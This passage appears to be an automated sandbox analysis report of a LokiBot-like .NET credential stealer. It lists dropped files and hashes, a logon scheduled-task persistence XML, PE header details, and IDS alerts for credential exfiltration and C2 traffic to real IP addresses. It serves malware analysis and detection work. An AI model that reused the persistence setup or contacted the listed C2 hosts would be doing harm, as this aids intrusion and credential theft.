	Fantazy.x86_64.elf	Get hash	malicious	Unknown	Browse	93.123.77.220
	Kloki.arm7.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	Kloki.m68k.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	Kloki.x86_64.elf	Get hash	malicious	Unknown	Browse	83.222.189.67

Process:	C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kzQ25HVUbf.exe.log

Download File

Process:	C:\Users\user\Desktop\kzQ25HVUbf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379633281639906
Encrypted:	false
SSDEEP:	48:BWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeC/ZM0Uyus:BLHxvCsIfA2KRHmOugw1s
MD5:	707D84D53930CEF35303F95757D41DFD
SHA1:	493518B676BEF7A575CC7F9AD46B2AA874FE0128
SHA-256:	C7D5489CB7AEFE8BD66DBE86814498EBF4721C28B6E01AE93D2633E9FF127C65
SHA-512:	B9DB31F55B1017E2B266124D1FB33A087642F0579952A9761B84EC6644A094BA150D78B2CE15A1821655283E308AF0FEB9CCEBCCA145F38F4926D075A7531F0D
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cilvf3zm.ed5.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbhljqab.uf5.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_immu0q43.5fw.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jcqiuy2s.fsl.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0xzud54.e24.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_udkaewyu.k0p.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v5laeug2.qrh.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vb055wb2.k3r.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp53FD.tmp

Download File

Process:	C:\Users\user\Desktop\kzQ25HVUbf.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1571
Entropy (8bit):	5.094947991315112
Encrypted:	false
SSDEEP:	48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewZv:HeLwYrFdOFzOz6dKrsuqu
MD5:	6D5905FF9B2D9E81A329A4B3B138205C
SHA1:	598D6F17789A9BA25DF4DA4F65E4E33F3A8AAC25
SHA-256:	CD8B0992764F7F63172F7B4CF5D0FA681338D7EB0D27861BDA5C7AF2062611DE
SHA-512:	75022C91678179DE64817E1A76F046560F19A75E13D9480475612A22EF0169FBE16D3A93B1F6EE924CC5FCDD8F63BD408D44A6C669FF5E438DEECD8C5062E156
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

C:\Users\user\AppData\Local\Temp\tmp851F.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1571
Entropy (8bit):	5.094947991315112
Encrypted:	false
SSDEEP:	48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewZv:HeLwYrFdOFzOz6dKrsuqu
MD5:	6D5905FF9B2D9E81A329A4B3B138205C
SHA1:	598D6F17789A9BA25DF4DA4F65E4E33F3A8AAC25
SHA-256:	CD8B0992764F7F63172F7B4CF5D0FA681338D7EB0D27861BDA5C7AF2062611DE
SHA-512:	75022C91678179DE64817E1A76F046560F19A75E13D9480475612A22EF0169FBE16D3A93B1F6EE924CC5FCDD8F63BD408D44A6C669FF5E438DEECD8C5062E156
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Users\user\Desktop\kzQ25HVUbf.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\1d921b7dbd459b1bfc7fa12af4fbde00_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\kzQ25HVUbf.exe
File Type:	data
Category:	modified
Size (bytes):	45
Entropy (8bit):	0.9111711733157262
Encrypted:	false
SSDEEP:	3:/lwltJ:Wz
MD5:	3D7D230E8E9B4E8202935E38050E13E5
SHA1:	DFABCB8DCBC48AB136F6F87A29BF4A7C9CCCCAAF
SHA-256:	269E9F79960D5201DA265CEF43575B1EF31644174DA7A9AB23501AD3A0CACFC3
SHA-512:	02BAF2F6CE0222EBFD4186641AC8F8BF8C54D0184A6C4C85F720171EEF8B1871ACCC9F3E522B80C8814428F52B007CE321312A76B4538D59E4A436D43011FF30
Malicious:	false
Preview:	........................................user.

C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe

Download File

Process:	C:\Users\user\Desktop\kzQ25HVUbf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	559616
Entropy (8bit):	7.657844809922727
Encrypted:	false
SSDEEP:	12288:9WFStAbHSWyMDswDGQKqHj6kN2YMdJ2U15usx+Xt:9Wk9yz6xqHT2YMdJ2U1x
MD5:	55550B1C9E27A22BC17744FC5CBA030C
SHA1:	02508BE8F94CD14E668D4892028A9A442671817C
SHA-256:	8097164E911C48C3E99B7676138F793A19FEE809D2931090EC7C0C2F65073889
SHA-512:	6F6C0E6B83DC96D58E9750F8C92C6F2FEF7B5699A4CE293B886123A9B0E3B9D572C5852B90C1F32CF0B9685304AC0729034B86B45229FEF59F19BE15F2799211
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............f.... ........@.. ....................................@.....................................O.......................................p............................................ ............... ..H............text...l.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................H.......H........d...K......`....................................................0..M.........}......}.....(.....sn......(.............s....o....}g......o...s....o.........0...........s......o.....".(......0...........s".....o.......0..+.........,..{.......+....,...{....o........(.......0............o ....+...0..S..........+4...+.......(........X...(..../..o!......+....-....X...o".../..o!......+....-.*..0..............o#.......o!...Y..........,T...($.....b..(%....b`..(&...`....

C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\kzQ25HVUbf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.657844809922727
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	kzQ25HVUbf.exe
File size:	559'616 bytes
MD5:	55550b1c9e27a22bc17744fc5cba030c
SHA1:	02508be8f94cd14e668d4892028a9a442671817c
SHA256:	8097164e911c48c3e99b7676138f793a19fee809d2931090ec7c0c2f65073889
SHA512:	6f6c0e6b83dc96d58e9750f8c92c6f2fef7b5699a4ce293b886123a9b0e3b9d572c5852b90c1f32cf0b9685304ac0729034b86b45229fef59f19be15f2799211
SSDEEP:	12288:9WFStAbHSWyMDswDGQKqHj6kN2YMdJ2U15usx+Xt:9Wk9yz6xqHT2YMdJ2U1x
TLSH:	24C401582619DA06CADA97B80A71F27927BC2EDEEA11D3034FDD3DEBB475F101D48242
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............f.... ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x489f66
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xD20BEEF3 [Tue Sep 2 00:10:27 2081 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, byte ptr [eax]
adc byte ptr [eax], al
add byte ptr [eax], al
and byte ptr [eax], al
add byte ptr [eax+00000018h], al
push eax
add byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x89f14	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8a000	0x5a4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x882b4	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x87f6c	0x88000	a00aac2d052041fed157140caec33e2d	False	0.8919731588924632	data	7.667730647457407	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8a000	0x5a4	0x600	508daff929be2045d459567956c6d5b0	False	0.421875	data	4.07120350395674	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8c000	0xc	0x200	8ba4dae81779ce4994033e10d4ef3206	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x8a090	0x314	data			0.4352791878172589
RT_MANIFEST	0x8a3b4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T08:37:17.283199+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49804	94.156.177.41	80	TCP
2025-01-11T08:37:17.283199+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49804	94.156.177.41	80	TCP
2025-01-11T08:37:17.283199+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49804	94.156.177.41	80	TCP
2025-01-11T08:37:17.995289+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.9	49804	94.156.177.41	80	TCP
2025-01-11T08:37:18.596493+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49811	94.156.177.41	80	TCP
2025-01-11T08:37:18.596493+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49811	94.156.177.41	80	TCP
2025-01-11T08:37:18.596493+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49811	94.156.177.41	80	TCP
2025-01-11T08:37:19.336213+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.9	49811	94.156.177.41	80	TCP
2025-01-11T08:37:19.430625+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49817	94.156.177.41	80	TCP
2025-01-11T08:37:19.430625+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49817	94.156.177.41	80	TCP
2025-01-11T08:37:19.430625+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49817	94.156.177.41	80	TCP
2025-01-11T08:37:20.138790+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49817	94.156.177.41	80	TCP
2025-01-11T08:37:20.295163+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49828	94.156.177.41	80	TCP
2025-01-11T08:37:20.295163+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49828	94.156.177.41	80	TCP
2025-01-11T08:37:20.295163+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49828	94.156.177.41	80	TCP
2025-01-11T08:37:21.015453+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49828	94.156.177.41	80	TCP
